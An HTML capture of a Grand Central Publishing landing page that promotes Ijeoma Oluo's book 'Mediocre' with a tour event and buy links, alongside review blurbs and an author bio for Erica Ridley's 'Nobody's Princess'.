<path role="presentation" class="youtube-cls-1" d="M25,.55A24.45,24.45,0,1,0,49.5,25,24.45,24.45,0,0,0,25,.55ZM37.5,26a29.54,29.54,0,0,1-.2,4.2,6.4,6.4,0,0,1-1,2.6,3.58,3.58,0,0,1-2.5,1.1c-3.5.3-8.7.3-8.7.3s-6.5-.1-8.5-.3a3.93,3.93,0,0,1-2.8-1.1,6.4,6.4,0,0,1-1-2.6,29.66,29.66,0,0,1-.3-4.2V24c.1-1.4.1-2.8.3-4.2a6.4,6.4,0,0,1,1-2.6,3.25,3.25,0,0,1,2.5-1.1c3.5-.3,8.7-.3,8.7-.3s5.2,0,8.7.3a3.41,3.41,0,0,1,2.5,1.1,6.4,6.4,0,0,1,1,2.6,20.49,20.49,0,0,1,.3,4.2Z" transform="translate(-0.5 -0.55)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="http://www.pinterest.com/grandcentralpub" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Pinterest"
					>
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 60 60" role="img" aria-labelledby="title-pinterest-icon-3042183329  desc-pinterest-icon-4032773066">
	<title id="title-pinterest-icon-3042183329">Pinterest Icon</title>
	<desc id="desc-pinterest-icon-4032773066">Pinterest icon</desc>
	<path class="cls-1" d="M56,14.94A29.87,29.87,0,0,0,45.06,4,29.35,29.35,0,0,0,30,0,29.35,29.35,0,0,0,14.94,4,29.87,29.87,0,0,0,4,14.94,29.35,29.35,0,0,0,0,30,29.08,29.08,0,0,0,5,46.52a29.9,29.9,0,0,0,13,11,25.87,25.87,0,0,1,.51-6.91l3.87-16.33a10.42,10.42,0,0,1-1-4.77A9,9,0,0,1,23,23.95a5,5,0,0,1,4.1-2.23,3.66,3.66,0,0,1,3,1.29,5,5,0,0,1,1.05,3.24,12.13,12.13,0,0,1-.45,2.95q-.45,1.74-1.17,4t-1,3.65a4.43,4.43,0,0,0,.9,4.08,4.78,4.78,0,0,0,3.83,1.7q4.18,0,6.86-4.65a22.29,22.29,0,0,0,2.68-11.29,11.08,11.08,0,0,0-3.3-8.32q-3.3-3.2-9.2-3.2A14.22,14.22,0,0,0,15.55,29.57a8.89,8.89,0,0,0,2,5.9A1.78,1.78,0,0,1,18,37.15q-.08.23-.31,1.17t-.31,1.21q-.31,1.25-1.48.78A8.82,8.82,0,0,1,11.29,36a15.62,15.62,0,0,1-1.56-7.15,17,17,0,0,1,.84-5.23,17.86,17.86,0,0,1,2.62-5.06,20.57,20.57,0,0,1,4.26-4.32,20,20,0,0,1,6-3,25.08,25.08,0,0,1,7.66-1.13,20.1,20.1,0,0,1,10,2.46,17.58,17.58,0,0,1,6.74,6.37,16.07,16.07,0,0,1,2.32,8.36,26.27,26.27,0,0,1-2,10.55,17.32,17.32,0,0,1-5.74,7.36,14.07,14.07,0,0,1-8.44,2.68,9.26,9.26,0,0,1-4.45-1.11,6.51,6.51,0,0,1-2.85-2.64Q24.88,51,24.53,52.34a24,24,0,0,1-3,6.41A30,30,0,0,0,45.06,56,29.87,29.87,0,0,0,56,45.06,29.35,29.35,0,0,0,60,30,29.35,29.35,0,0,0,56,14.94Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
									</ul>

	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.grandcentralpublishing.com/">
		<label class="site-search__label" for="search-form-629773796833b">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-629773796833b" value="" placeholder="Search the website for a title or author" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-2723123269  desc-search-icon-2820865042">
	<title id="title-search-icon-2723123269">Search</title>
	<desc id="desc-search-icon-2820865042">magnifying glass graphic</desc>
	<path class="cls-2" d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-grand-central-publishing-container"><nav class="site-header__nav"><ul id="menu-grand-central-publishing" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/page/about-gcp/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About GCP">About GCP</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/landing-page/meet-gcp/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet GCP">Meet GCP</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="#" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1778533721" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1778533721" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1778533721" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-566766501  desc-arrow-1570148431">
	<title id="titlet-arrow-566766501">Arrow Icon</title>
	<desc id="desc-arrow-1570148431">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1778533721" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1778533721"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.legacylitbooks.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve">Twelve</a></span></li></ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/page/gcp-clubcar/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="GCP Club Car">GCP Club Car</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/page/grand-central-publishing-pop-x-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="GCP Pop x Books">GCP Pop x Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/landing-page/gcps-sizzling-summer-reads/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sizzling Summer Reads">Sizzling Summer Reads</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Home">HBG Home</a></span></li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.grandcentralpublishing.com/">
		<label class="site-search__label" for="search-form-629773796cfb2">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-629773796cfb2" value="" placeholder="Search the website for a title or author" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-1363870349  desc-search-icon-4172064470">
	<title id="title-search-icon-1363870349">Search</title>
	<desc id="desc-search-icon-4172064470">magnifying glass graphic</desc>
	<path class="cls-2" d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Popup Modal -->
<div class="modal-popup modal-site-popup modal-imprint-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Get recommended reads, deals, and more from Hachette</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Get recommended reads, deals, and more from Hachette</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					Sign Up				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.grandcentralpublishing.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.grandcentralpublishing.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>
			<div id="content" class="site__content">
									<div class="landing-page-module module-carousel-background__0 "
					>
			
<div class="featured-carousel module">
	<div class="module__content">
		<div id="hachette-carousel-1991692443"
			class="carousel slide"
			data-interval=false			data-ride=false			>
			<ol class="carousel-indicators">
									<li data-target="#hachette-carousel-1991692443" data-slide-to="1"></li>
									<li data-target="#hachette-carousel-1991692443" data-slide-to="2"></li>
							</ol>
			<div class="carousel-inner" role="listbox">
									<div class="item carousel__slide">
						<div class="carousel__slide-content carousel__slide-content--fullBleed
						 fc_has_no_front_image fc_has_no_caption							">
															<div class="featured-carousel__bg-image
																	" data-swap-location=".featured-carousel__mobile-image-43221376" data-swap-method="append" data-swap-max="l">
											
			
			
			<img src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/05/2-2.png?resize=1920%2C560">
		
									</div>
														
							<div class="featured-carousel__caption ">
								<div class="featured-carousel__caption-text">
									
									
									
									
																	</div>

								<div class="featured-carousel__mobile-image featured-carousel__mobile-image-43221376"></div>

															</div>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content carousel__slide-content--fullBleed
						 fc_has_no_front_image fc_has_no_caption							">
															<div class="featured-carousel__bg-image
																	" data-swap-location=".featured-carousel__mobile-image-2508630506" data-swap-method="append" data-swap-max="l">
											
			
			
			<img src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/05/1.png?resize=1920%2C560">
		
									</div>
														
							<div class="featured-carousel__caption ">
								<div class="featured-carousel__caption-text">
									
									
									
									
																	</div>

								<div class="featured-carousel__mobile-image featured-carousel__mobile-image-2508630506"></div>

															</div>
						</div>
					</div>
							</div>
			<a class="left carousel-control site-carousel__control--prev" href="#hachette-carousel-1991692443" role="button" aria-label="Left Arrow" data-slide="prev" data-type="link-event" data-category="Hero Slider" data-action="Click Hero" data-label="">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-2483825836  desc-left-arrow-2870881007">
	<title id="title-left-arrow-2483825836">Left Arrow</title>
	<desc id="desc-left-arrow-2870881007">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
			<a class="right carousel-control site-carousel__control--next" href="#hachette-carousel-1991692443" role="button" aria-label="Right Arrow" data-slide="next" data-type="link-event" data-category="Hero Slider" data-action="Click Hero" data-label="">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-1327409769  desc-right-arrow-2811376653">
	<title id="title-right-arrow-1327409769">Right Arrow</title>
	<desc id="desc-right-arrow-2811376653">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
		</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-content-block__1 "
					>
			
<div class="content-block module module--fixed">
	<div class="module__content module--fixed">
		<div class="content-block__content">
						<article class="content-block__article">
				<div class="content-block__post-meta">
					<div class="content-block__post-content">
						<div style="font-size: 34px;text-align: center">
<p><span style="color: #c81f39"><strong>Join Ijeoma Oluo on Tour</strong></span></p>
</div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div style="font-size: 18px">
<p style="text-align: center"><strong><strong>November 11, 2021  | Virtual Event | Tacoma</strong></strong></p>
<p style="text-align: center">In conversation with Austin Channing Brown  |  Hosted by Parable<br />
<span style="color: #1e4a8c"><strong><a href="https://parabletacoma.com/pages/ijeoma-oluo-and-austin-channing-brown-event" target="_blank" rel="noopener"><span style="text-decoration: underline">Get Tickets</span></a></strong></span></p>
</div>
					</div>
				</div>

							</article>

					</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-content-block__2 "
							id="about-the-book"
						>
			
<div class="content-block module module--fixed">
	<div class="module__content module--fixed">
		<div class="content-block__content">
						<article class="content-block__article">
				<div class="content-block__post-meta">
					<div class="content-block__post-content">
						<div style="font-size: 34px;text-align: center"><span style="color: #c81f39"><strong>About the Book</strong></span></div>
<p>&nbsp;</p>
<div style="font-size: 17px">
<p><strong><a href="https://www.sealpress.com/titles/ijeoma-oluo/mediocre/9781580059527/" target="_blank" rel="noopener"><img class="alignleft wp-image-1141680 size-large" src="https://www.hachettebookgroup.com/wp-content/uploads/2020/10/Mediocre-for-website.png?w=400" alt="" width="400" height="465" /></a></strong></p>
<p>&nbsp;</p>
<p><b>From the author of the #1 <i>New York Times </i>bestseller <i>So You Want to Talk About Race</i>, an  “illuminating” (<i>New York Times </i>Book Review) history of white male identity.</b></p>
<p>&nbsp;</p>
<p>What happens to a country that tells generation after generation of white men that they deserve power? What happens when success is defined by status over women and people of color, instead of by actual accomplishments?</p>
<p>Through the last 150 years of American history — from the post-reconstruction South and the mythic stories of cowboys in the West, to the present-day controversy over NFL protests and the backlash against the rise of women in politics — Ijeoma Oluo exposes the devastating consequences of white male supremacy on women, people of color, and white men themselves. <i>Mediocre </i>investigates the real costs of this phenomenon in order to imagine a new white male identity, one free from racism and sexism.</p>
<p>&nbsp;</p>
<p>As provocative as it is essential, this book will upend everything you thought you knew about American identity and offers a bold new vision of American greatness.</p>
<p style="text-align: left;font-size: 10px;color: #ffffff">_</p>
<p>&nbsp;</p>
<p style="text-align: left"><span style="color: #1e4a8c">Ijeoma started the Seattle Artist Relief Fund to help artists in Seattle who lost work due to COVID-19 cancellations. Please make a tax deductible donation if you can at <span style="text-decoration: underline"><a href="https://www.langstonseattle.org/home/sarf/" target="_blank" rel="noopener"><span style="color: #1e4a8c">www.langstonseattle.org/home/sarf</span></a></span></span></p>
</div>
					</div>
				</div>

							</article>

					</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-buy-buttons__3 "
					>
			
<div class="content-block module module--fixed">
	<div class="content-block__content">
					<h2 class="module-header module-header--default-center">
				Order Now			</h2>
		
		<div class="buy-button-container module__content module--fixed">
							<a target="_blank" href="https://www.indiebound.org/book/9781580059527"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="IndieBound"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								IndieBound						</span>
					</div>
				</a>
							<a target="_blank" href="http://www.powells.com/book/-9781580059527"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="Powell&#039;s"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								Powell&#039;s						</span>
					</div>
				</a>
							<a target="_blank" href="https://bookshop.org/books/mediocre-the-dangerous-legacy-of-white-male-america/9781580059527"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="bookshop.org"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								bookshop.org						</span>
					</div>
				</a>
							<a target="_blank" href="https://www.barnesandnoble.com/w/mediocre-ijeoma-oluo/1133331890;jsessionid=9D619AA45EFD08897649B3B82EDEE0A1.prodny_store02-atgap17?ean=9781580059527&#038;st=AFF&#038;2sid=Hachette%20Book%20Group_8040641_NA&#038;sourceId=AFFHachette%20Book%20Group"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="Barnes &amp; Noble"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								Barnes &amp; Noble						</span>
					</div>
				</a>
							<a target="_blank" href="https://www.amazon.com/gp/product/158005952X?tag=hacboogrosit-20"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="Amazon"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								Amazon						</span>
					</div>
				</a>
							<a target="_blank" href="https://libro.fm/audiobooks/9781549150302"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="Libro.fm"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								Libro.fm						</span>
					</div>
				</a>
							<a target="_blank" href="https://www.audiobooks.com/audiobook/mediocre-the-dangerous-legacy-of-white-male-america/405394"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="Audiobooks.com"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								Audiobooks.com						</span>
					</div>
				</a>
							<a target="_blank" href="https://www.downpour.com/catalogsearch/result/?q=9781549150302&#038;__cf_chl_captcha_tk__=pmd_tRNTE3wBcWk2j2vg4icUQMONV8Zc5lbBnytETv.3_wE-1635443597-0-gqNtZGzNA1CjcnBszQml"
				   data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
				   data-label="Downpour"
				>
					<div class="btn btn-default btn-default buy-button-module__btn">
						<span class="buy-button-module__text">
								Downpour						</span>
					</div>
				</a>
					</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-content-block__4 "
					>
			
<div class="content-block module module--fixed">
	<div class="module__content module--fixed">
		<div class="content-block__content">
						<article class="content-block__article">
				<div class="content-block__post-meta">
					<div class="content-block__post-content">
						<div style="font-size: 34px;text-align: center"><span style="color: #ff6bcd"><strong>Love for <em>Nobody's Princess</em></strong></span></div>
<p>&nbsp;</p>
<div style="font-size: 18px">"Ridley hits the sweet spot of tickling readers’ funny bones and pulling on their heartstrings in equal measure. This is a joy."<strong><br />
<span style="color: #ff6bcd"> —<em>Publishers Weekly</em>, starred review</span></strong></div>
<div></div>
<div style="font-size: 18px">“Writing with plenty of panache, a flair for thoughtful characterization, and an exhilarating sense of humor, Ridley deftly delivers another marvelously imaginative addition to her Wild Wynchesters series that proves to be another perfect dose of reading joy.”<strong><br />
<span style="color: #ff6bcd"> —<em>Booklist</em>, </span><span style="color: #ff6bcd">starred review</span></strong></div>
<div></div>
<div style="font-size: 18px">“The story is fun and playful, but weighty topics are deftly mixed in… Another pleasing and joyful addition to the Wild Wynchesters series.”<strong><br />
<span style="color: #ff6bcd"> —<em>Kirkus</em></span></strong></div>
<div></div>
<div style="font-size: 18px">“Ridley, who has a deft hand with dialogue and detail and crafts bookmark-it scenes and byplay, is fast becoming an auto-buy author and makes a good read-alike suggestion for fans of Lisa Kleypas, Grace Burrowes, and Elizabeth Hoyt.”<strong><br />
<span style="color: #ff6bcd"> —<em>Library Journal</em></span></strong></div>
					</div>
				</div>

							</article>

					</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-content-block__5 "
					>
			
<div class="content-block module module--fixed">
	<div class="module__content module--fixed">
		<div class="content-block__content">
						<article class="content-block__article">
				<div class="content-block__post-meta">
					<div class="content-block__post-content">
						<div style="font-size: 34px;text-align: center"><span style="color: #ff6bcd"><strong>About the Author</strong></span></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div style="font-size: 18px">
<p><img class="alignleft wp-image-1225211 " src="https://www.hachettebookgroup.com/wp-content/uploads/2022/05/Erica-Ridley-1.jpg?w=768" alt="" width="157" height="209" /> <b>Erica Ridley</b> is a <i>New York Times</i> and <i>USA Today</i> bestselling author of historical romance novels. When not reading or writing romances, Erica can be found riding camels in Africa, zip-lining through rain forests in Costa Rica, or getting hopelessly lost in the middle of Budapest.</p>
<p>&nbsp;</p>
<p>Twitter: <a href="https://twitter.com/EricaRidley" target="_blank" rel="noopener">@EricaRidley</a></p>
<p>Instagram: <a href="https://instagram.com/EricaRidley" target="_blank" rel="noopener">@EricaRidley</a></p>
</div>
					</div>
				</div>

							</article>

					</div>
	</div>
</div>
		</div>
						
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-1933704146  desc-hachette-logo-ini-3674667061">
<title id="title-hachette-logo-ini-1933704146">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-3674667061">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
	<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.grandcentralpublishing.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.grandcentralpublishing.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.grandcentralpublishing.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/mu-plugins/jetpack-10.9/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/dom-ready.min.js?ver=d996b53411d1533a84951212ab6ac4ff' id='wp-dom-ready-js'></script>
